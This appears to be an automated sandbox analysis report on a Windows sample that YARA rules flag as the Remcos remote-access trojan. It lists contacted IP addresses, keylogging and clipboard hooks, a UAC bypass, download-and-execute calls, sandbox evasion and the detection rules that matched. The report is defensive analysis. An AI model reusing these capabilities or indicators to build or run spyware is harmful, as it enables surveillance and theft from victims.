                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 103.144.139.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 65.21.245.7
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00404B96 WaitForSingleObject,SetEvent,recv,0_2_00404B96
                        Source: FPPhfkcDCh.exeString found in binary or memory: http://geoplugin.net/json.gp
                        Source: FPPhfkcDCh.exeString found in binary or memory: http://geoplugin.net/json.gp/C

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000000_2_0040A2F3
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\FPPhfkcDCh.exeJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168FC
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B749
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A41B
                        Source: Yara matchFile source: FPPhfkcDCh.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: FPPhfkcDCh.exe PID: 7560, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: FPPhfkcDCh.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: FPPhfkcDCh.exe PID: 7560, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041CA6D SystemParametersInfoW,0_2_0041CA6D
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041CA73 SystemParametersInfoW,0_2_0041CA73

                        System Summary

                        barindex
                        Source: FPPhfkcDCh.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: FPPhfkcDCh.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: FPPhfkcDCh.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: FPPhfkcDCh.exe PID: 7560, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_0041330D
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,0_2_0041BBC6
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041BB9A
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004167EF
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0043706A0_2_0043706A
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004140050_2_00414005
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0043E11C0_2_0043E11C
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004541D90_2_004541D9
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004381E80_2_004381E8
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041F18B0_2_0041F18B
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004462700_2_00446270
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0043E34B0_2_0043E34B
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004533AB0_2_004533AB
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0042742E0_2_0042742E
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004375660_2_00437566
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0043E5A80_2_0043E5A8
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004387F00_2_004387F0
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0043797E0_2_0043797E
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004339D70_2_004339D7
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0044DA490_2_0044DA49
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00427AD70_2_00427AD7
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041DBF30_2_0041DBF3
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00427C400_2_00427C40
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00437DB30_2_00437DB3
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00435EEB0_2_00435EEB
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0043DEED0_2_0043DEED
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00426E9F0_2_00426E9F
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: String function: 00402093 appears 50 times
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: String function: 00401E65 appears 34 times
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: String function: 00434E70 appears 54 times
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: String function: 00434801 appears 42 times
                        Source: FPPhfkcDCh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: FPPhfkcDCh.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: FPPhfkcDCh.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: FPPhfkcDCh.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: FPPhfkcDCh.exe PID: 7560, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/1@0/3
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0041798D
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F4AF
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041B539
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeMutant created: \Sessions\1\BaseNamedObjects\one_fjyueo-T589A4
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: Software\0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: Exe0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: Exe0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: ,aF0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: Inj0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: Inj0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: 86l0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: 86l0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: 86l0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: 8SG0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: 86l0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: exepath0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: ,aF0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: 8SG0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: exepath0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: 86l0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: licence0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: dMG0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: `m0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: PSG0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: Administrator0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: User0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: del0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: del0_2_0040EA00
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCommand line argument: del0_2_0040EA00
                        Source: FPPhfkcDCh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: FPPhfkcDCh.exeReversingLabs: Detection: 84%
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeSection loaded: cryptbase.dllJump to behavior
                        Source: FPPhfkcDCh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: FPPhfkcDCh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: FPPhfkcDCh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: FPPhfkcDCh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: FPPhfkcDCh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: FPPhfkcDCh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: FPPhfkcDCh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: FPPhfkcDCh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: FPPhfkcDCh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: FPPhfkcDCh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: FPPhfkcDCh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: FPPhfkcDCh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00457186 push ecx; ret 0_2_00457199
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041C7F3 push eax; retf 0_2_0041C7FD
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00457AA8 push eax; ret 0_2_00457AC6
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00434EB6 push ecx; ret 0_2_00434EC9
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00406EEB ShellExecuteW,URLDownloadToFileW,0_2_00406EEB
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040F7E2 Sleep,ExitProcess,0_2_0040F7E2
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A7D9
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeWindow / User API: threadDelayed 1828Jump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeWindow / User API: threadDelayed 7650Jump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeWindow / User API: foregroundWindowGot 1766Jump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exe TID: 7584Thread sleep count: 216 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exe TID: 7584Thread sleep time: -108000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exe TID: 7588Thread sleep count: 1828 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exe TID: 7588Thread sleep time: -5484000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exe TID: 7588Thread sleep count: 7650 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exe TID: 7588Thread sleep time: -22950000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
